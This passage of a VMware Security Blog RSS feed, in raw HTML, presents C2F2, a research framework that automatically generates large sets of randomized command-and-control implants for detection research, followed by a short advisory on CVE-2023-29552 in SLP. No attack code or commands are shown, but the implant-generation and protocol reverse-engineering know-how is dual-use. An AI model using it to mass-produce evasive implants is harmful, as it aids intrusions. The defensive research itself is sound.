cp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Appropriate firewall configurations and robust
endpoint protection systems can aid in preventing scenarios like this, b ]]>
<![CDATA[ ut attackers can customize implants to increase the likelihood of
flying under the radar. For instance, attackers can modify network traffic to
resemble legitimate communication with the C2 server or modify the binary
footprint of the implant through a parametric generation process. However, the
pos ]]>
<![CDATA[ sibility to create implants using various configuration options can be
leveraged by security researchers to create a vast dataset of samples and study
their invariants. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span ]]>
<![CDATA[ data-contrast="none">This blog post builds on the aforementioned idea
and aims to explore the potential of exploiting the polymorphic capabilities of
these implants to create a large dataset of samples. This dataset will then be
analyzed using a machine learning pipeline to identify any invariants ]]>
<![CDATA[ that can be used to improve our defenses against these
attacks.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">To achieve this goal, we developed a framework,
called C2F2, that abstracts the under ]]>
<![CDATA[ lying C2 framework and automatically generates C2 implants with
randomized options by iteratively changing the settings used at configuration
time. This process is repeated for each C2 framework, leading up to a
diversified yet representative dataset of malicious implants. </span><span
data-contrast ]]>
<![CDATA[ ="none">By analyzing this large collection of samples, security
professionals can also gain insights into the tactics, techniques, and
procedures (TTPs) used by threat actors to develop and deploy these
implants.</span></p> <h2 aria-level="1"><span data-contrast="none">C2F2: A C2
Framework Framework ]]>
<![CDATA[ </span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">The C2 frameworks targeted by C2F2 are the
following:</span><span dat ]]>
<![CDATA[
a-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ul> <li><a href="https://bruteratel.com/"><span data-contrast="none">Brute
Ratel</span></a><span data-ccp-props="{&quot;134245418&quot;:tru ]]>
<![CDATA[
e,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><a href="https://www.cobaltstrike.com/"><span data-contrast="none">Cobalt
Strike</span></a><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;
]]>
<![CDATA[
201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><a href="https://github.com/cobbr/Covenant"><span
data-contrast="none">Covenant</span></a><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&qu
]]>
<![CDATA[ ot;:160,&quot;335559740&quot;:259}"> </span></li> <li><a
href="https://github.com/BC-SECURITY/Empire"><span
data-contrast="none">Empire</span></a><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}
]]>
<![CDATA[ "> </span></li> <li><a href="https://github.com/sensepost/godoh"><span
data-contrast="none">Godoh</span></a><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><a href="https:// ]]>
<![CDATA[ github.com/Ne0nd0g/merlin"><span
data-contrast="none">Merlin</span></a><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><a href="https://www.offsec.com/metasploit-unleashed/ab ]]>
<![CDATA[ out-meterpreter/"><span
data-contrast="none">Meterpreter</span></a><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><a href="https://github.com/nettitude/PoshC2"><span data-co ]]>
<![CDATA[ ntrast="none">PoshC2</span></a><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><a href="https://github.com/bats3c/shad0w"><span
data-contrast="none">Shad0w</span></a><span da ]]>
<![CDATA[
ta-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><a href="https://github.com/BishopFox/sliver"><span
data-contrast="none">Sliver</span></a><span
data-ccp-props="{&quot;134245418&quot; ]]>
<![CDATA[
:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ul> <p><span data-contrast="none">Before diving into the implant generation
process, we had to take several preparatory steps to ensure that the process can
run smoothly an ]]>
<![CDATA[ d effectively. Firstly, we had to understand the set of possible
options and respective values for each C2 framework. Secondly, it was necessary
to understand how to instrument and interact with each C2 framework to generate
the implant. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;3 ]]>
<![CDATA[ 35559739&quot;:160,&quot;335559740&quot;:259}"> </span></p> <p><span
data-contrast="none">Interacting with various C2 frameworks can be a challenging
task due to their differing interfaces. While some frameworks, like Sliver,
offer user-friendly command-line interfaces with multiple options, others ]]>
<![CDATA[ can only be queried via bespoke mechanisms; for example, Cobalt Strike
can only be interacted with using the Aggressor Script language. Additionally,
Brute Ratel and Covenant proved to be the most challenging. The former required
us to fully reverse-engineer the communication protocol used by the C ]]>
<![CDATA[ 2 server and the implant, while the latter, despite having various
functionality exposed via a RESTful API, required us to create the missing
implant generation functionality ourselves.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </spa
]]>
<![CDATA[ n></p> <p><span data-contrast="none">Specifically, the Brute Ratel’s
protocol requires the client to perform authorization twice: the first time by
sending the login and the password via an HTTP POST request, and then the second
time with the token, received from the first authorization attempt, s ]]>
<![CDATA[ ent via a newly established WebSocket channel. After successful
authorization, the WebSocket connection is used for client-server communication
where the client sends commands (e.g., “create a badger profile with the
following parameters”) and the server replies with status codes and the additio
]]>
<![CDATA[ nal data (e.g., with a Base64-encoded payload) that the client might
have requested. Both channels (the initial POST request and the WebSocket
connection) are JSON-based and use HTTPS as a transport layer.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740
]]>
<![CDATA[ &quot;:259}"> </span></p> <p><span data-contrast="none">Covenant, on
the other hand, has a documented set of APIs, that include functions to create
implants. The APIs are based on JSON and use HTTPS as a transport layer.  While
most of the functions indeed generate implants, some of them (e.g., the function
to generate a .NET executable implant) return no payload with the standard
reply. The payload is generated but never returned because that functionality is
not implemented. To overcome this limitation, the code of the framework was
amended to store the generated payload on disk.</span><sp ]]>
<![CDATA[ an
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">Once the options for each implant type had been
identified, we used a domain-specific language (DSL) to express them in a format
that can be easily consumed b ]]>
<![CDATA[ y the implant-generation process. This required careful consideration
and planning to ensure that the process is efficient and scalable. Finally, we
implemented an algorithm that given the grammar of one of the implant
configurations expressed with our DSL, can generate random configurations that
ar ]]>
<![CDATA[ e consistent with it. These configurations are then used to generate
the implants. This approach can be used to generate a large number of implant
variations, each tailored to specific target environments, and can be used to
test the effectiveness of various detection and defense strategies and to g ]]>
<![CDATA[ enerate signatures or detection procedures.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Architecture</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot ]]>
<![CDATA[
;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="none">We designed our framework based on two key
properties of the problem we needed to solve. Firstly, generating a single
implant can be a time-consum ]]>
<![CDATA[ ing process that may take several minutes to complete due to the
complexity of the steps involved; for example, in the case of Cobalt Strike,
creating a Malleable C2 profile, starting a Cobalt Strike server, using
Aggressor Scripts to generate the implant binary, and waiting for the result to
be pro ]]>
<![CDATA[ duced require several minutes. Secondly, the process of generating one
implant is independent of other implants, meaning that multiple implants can be
generated simultaneously in parallel, which can significantly increase the
efficiency of the process. To address these two factors, we ensured that o ]]>
<![CDATA[ ur framework was capable of handling asynchronous long-lasting jobs
and designed it to be easily parallelizable.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">Our infrastructure consists of four ]]>
<![CDATA[ key components that work together to facilitate the process of
generating implants:</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ul> <li><b><span data-contrast="none">Generator</span></b><span
data-contrast="none">: This co ]]>
<![CDATA[ mponent retrieves the correct grammar based on the specified C2
framework type and generates a random implant configuration. The configuration
is then stored in the designated storage backend for future use.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;3355597
]]>
<![CDATA[ 40&quot;:259}"> </span></li> <li><b><span
data-contrast="none">Submitter</span></b><span data-contrast="none">: Once an
implant configuration is available, the submitter creates a job and sends it to
the appropriate queue based on the configuration type.</span><span
data-ccp-props="{&quot;201341983 ]]>
<![CDATA[
&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><b><span data-contrast="none">Receiver</span></b><span
data-contrast="none">: This component pulls jobs from the queue and sets up the
worker to generate the corresponding implant. Once the job is completed, the
receiv ]]>
<![CDATA[ er collects the result.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><b><span data-contrast="none">Worker</span></b><span data-contrast="none">:
Each worker is specialized in generating implants for a specific C2 framew ]]>
<![CDATA[ ork. Given an implant configuration, the worker generates the
corresponding implant. By dividing the workload across multiple workers, our
infrastructure is able to generate multiple implants in parallel, significantly
reducing the time required to generate large numbers of implants. Overall, these
]]>
<![CDATA[ components work seamlessly together to automate the implant generation
process and improve the efficiency of our system.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><br
/> </span></li> </ul> <p><a href="https://blogs.vmware.com/security/ ]]>
<![CDATA[ files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83466"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-1024x452.png"
alt="" width="900" height="397" srcset="https://blogs.vmware.com/secur ]]>
<![CDATA[ ity/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-1024x452.png
1024w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-300x132.png
300w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-768x339.png
768w, https://blogs.vmwar ]]>
<![CDATA[
e.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-1536x678.png
1536w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-2048x904.png
2048w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-600x265.png
600w" sizes= ]]>
<![CDATA[ "(max-width: 900px) 100vw, 900px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">2</span></i><i><span data-contrast="none">: C2F2
architecture for the generation of implant at scale.</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550 ]]>
<![CDATA[
&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">As shown in </span><span
data-contrast="auto">Figure 2</span><span data-contrast="none">, the workflow
for generating implants using the C2F2 system can be broken down i ]]>
<![CDATA[ nto the following steps: </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ol> <li><span data-contrast="none">The user chooses the C2 framework type and
the number of implants to be generated and initiates the process.</span>< ]]>
<![CDATA[ span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><span data-contrast="none">The generator component retrieves the appropriate
grammar and generates the given number of random implant configurations, which
are then stored in the se ]]>
<![CDATA[ lected storage backend.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><span data-contrast="none">The submitter creates a job for each generated
configuration and sends it to the appropriate queue based on its type.</span ]]>
<![CDATA[ ><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><span data-contrast="none">The receiver pulls jobs from the queue and sets
up the appropriate specialized worker.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559 ]]>
<![CDATA[ 739&quot;:160,&quot;335559740&quot;:259}"> </span></li> <li><span
data-contrast="none">The worker reads the configuration file and, using the
appropriate C2 framework, generates the implant.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">
]]>
<![CDATA[  </span></li> <li><span data-contrast="none">Once the worker has
generated the implant, the receiver collects the result and stores it in the
designated storage backend.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><sp ]]>
<![CDATA[ an data-contrast="none">Steps 4, 5, and 6 are repeated until the queue
is empty.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ol> <p><span data-contrast="none">Alternatively, the user can provide a custom
implant configur ]]>
<![CDATA[ ation, in which case the submitter sends the job directly to the
appropriate queue and the process continues as usual.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">Overall, this process ensures ]]>
<![CDATA[ that implant generation is standardized and customizable, making it
more efficient and effective.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Configuration
Generation</span><spa ]]>
<![CDATA[ n
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">Generating a vast number of valid C2 implant
configurations was a top priority w ]]>
<![CDATA[ hen designing the C2F2 implant generation system. To achieve this
goal, we aimed to significantly minimize the need for manual intervention. This
involved just one initial step in our exploratory phase, where researchers from
our team read each C2 framework specification and encoded the set of all p ]]>
<![CDATA[ ossible configuration types in our domain-specific language. Thanks to
having the models expressed in a DSL, we could generate configuration files that
were valid by default, adhering to the grammar encoded in the model.
Furthermore, the model (showcased in </span><span data-contrast="auto">Figure 3
]]>
<![CDATA[ </span><span data-contrast="auto">) also allows us to verify any
external configurations, guaranteeing that only valid configurations entered our
system.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><a href="https://blogs ]]>
<![CDATA[
.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83467"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-1024x411.png"
alt="" width="900" height="361" srcset="https://b ]]>
<![CDATA[
logs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-1024x411.png
1024w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-300x120.png
300w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-768x308.png
768w ]]>
<![CDATA[ ,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-1536x616.png
1536w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-600x241.png
600w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM.png
1 ]]>
<![CDATA[ 700w" sizes="(max-width: 900px) 100vw, 900px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">3</span></i><i><span data-contrast="none">: Generation and
validation of models in C2F2.</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550& ]]>
<![CDATA[
quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">To encode our configuration models, we decided to
utilize </span><a href="https://docs.pydantic.dev/"><span
data-contrast="none">Pydantic,</span></a><span data-contrast=" ]]>
<![CDATA[ auto"> a Python library for data validation that uses the Python type
system. Our decision to use Pydantic was based on multiple factors. Firstly, it
allowed us to encode the models directly using Python’s syntax. This made it
easier for our team to work with the tool and allowed us to quickly bui ]]>
<![CDATA[ ld understanding and expertise. Additionally, Pydantic provides a high
degree of flexibility, making it perfect for our needs.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">To give an example of ]]>
<![CDATA[ how Pydantic can be used, we can examine one of our implant models
created for the Shad0w C2 framework. The model is shown in </span><span
data-contrast="auto">Figure 4</span><span data-contrast="auto">.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&q
]]>
<![CDATA[ uot;:259}"> </span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83468"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-1024x441.png"
]]>
<![CDATA[ alt="" width="900" height="388"
srcset="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-1024x441.png
1024w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-300x129.png
300w, https://blogs.vmware.com/security/files/2023/04/Scr ]]>
<![CDATA[ een-Shot-2023-04-26-at-3.01.03-PM-768x331.png 768w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-1536x661.png
1536w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-600x258.png
600w, https://blogs.vmware.com/security/files/ ]]>
<![CDATA[ 2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM.png 1658w"
sizes="(max-width: 900px) 100vw, 900px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">4</span></i><i><span data-contrast="none">: Model generated
for Shad0w.</span></i><span data-ccp-props="{&quot;2 ]]>
<![CDATA[
01341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Pydantic offers more flexibility than just using
primitive types when defining our model types. For example, it allows us to have
more control over the value range for a given field, and it also supports more
complex types such as enumeration and custom types. After defining our models,
Pydantic allows us to obtain the schema definition as a Python dictionary, which
is then parsed and interpreted as the model grammar by our generator.
Furthermore, Pydantic also provides a method for us to validate a random JSON
against the model schema, ensuring that the generated configs adhere to the
specifications.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">A concrete example of a generated valid
configuration file for Shad0w can be observed in </span><span
data-contrast="auto">Figure 5</span><span data-contrast="auto">. The generated
configuration validates against the Shad0w model schema and is interpretable by
our system.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><a
href="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83469"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-1024x552.png"
alt="" width="800" height="431"
srcset="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-1024x552.png
1024w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-300x162.png
300w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-768x414.png
768w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-410x222.png
410w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-600x323.png
600w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM.png
1036w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">5</span></i><i><span data-contrast="none">: Valid
configuration generated for Shad0w.</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Conclusions</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">In this blog post we presented C2F2, a framework
designed to instrument existing C2 frameworks. We show how it is possible to
leverage C2F2 to generate a large dataset of implants by leveraging the
configuration options provided by the selected C2 frameworks. Generating a large
number of implants is the first building block of any pipeline designed to
analyze and behaviorally detect backdoors at scale. While we are working on
releasing the framework to the public by mid-2023, we hope that providing an
early preview can foster further discussions and feedback on the topic from the
community.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto"> </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p><p>The
post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html">It’s
Raining Implants: How to Generate C2 Framework Implants At Scale</a> appeared
first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware
Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>VMware Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS)
Amplification Vulnerability in SLP</title>
<link>https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html?utm_source=rss&utm_medium=rss&utm_campaign=vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp</link>
<dc:creator>
<![CDATA[ Edward Hawkins ]]>
...
</dc:creator>
<pubDate>Tue, 25 Apr 2023 14:08:33 +0000</pubDate>
<category>
<![CDATA[ VMware Security Response Center ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83452</guid>
<description>
<![CDATA[ <div><img width="300" height="163"
src="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png
300w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-222x120.png
222w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured.png
1709w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Greetings from the
VMware Security Response Center! Today we wanted to address CVE-2023-29552
&#8211; a vulnerability in SLP that could allow for a reflective
denial-of-service amplification attack that was disclosed on April 25th, 2023.
VMware has investigated this vulnerability and determined that currently
supported ESXi releases (ESXi 7.x and 8.x lines) are not impacted. However,
&#8230; <a
href="https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html">VMware
Response to CVE-2023-29552 &#8211; Reflective Denial-of-Service (DoS)
Amplification Vulnerability in SLP</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="163"
src="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png
300w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-222x120.png
222w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured.png
1709w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>Greetings from the
VMware Security Response Center!</p> <p>Today we wanted to address
CVE-2023-29552 &#8211; a vulnerability in SLP that could allow for a reflective
denial-of-service amplification attack that was disclosed on April 25th,
2023.</p> <p>VMware has investigated this vulnerability and determined that
currently supported ESXi releases (ESXi 7.x and 8.x lines) are not impacted.</p>
<p>However, releases that have reached end of general support (EOGS) such as 6.7
and 6.5 have been found to be impacted by CVE-2023-29552. As per previous
guidance and best practice VMware recommends that the best option to address
CVE-2023-29552 is to upgrade to a supported release line that is not impacted by
the vulnerability. ESXi 7.0 U2c and newer, and ESXi 8.0 GA and newer, ship with
the SLP service hardened, disabled by default, and filtered by the ESXi
firewall. In lieu of an upgrade to a supported release, ESXi admins should
ensure that their ESXi hosts are not exposed to untrusted networks and also
disable SLP following the instructions in <a
href="https://kb.vmware.com/s/article/76372" target="_blank"
rel="noopener">KB76372</a>.</p> <p>VMware would like to thank Bitsight and CISA
for reporting this vulnerability to us.</p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html">VMware
Response to CVE-2023-29552 &#8211; Reflective Denial-of-Service (DoS)
Amplification Vulnerability in SLP</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Bring Your Own Backdoor: How Vulnerable Drivers Let Hackers In</title>
<link>https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html?utm_source=rss&utm_medium=rss&utm_campaign=bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in</link>
<dc:creator>
<![CDATA[ Dana Behling ]]>
...
</dc:creator>
<pubDate>Wed, 19 Apr 2023 17:56:42 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83445</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
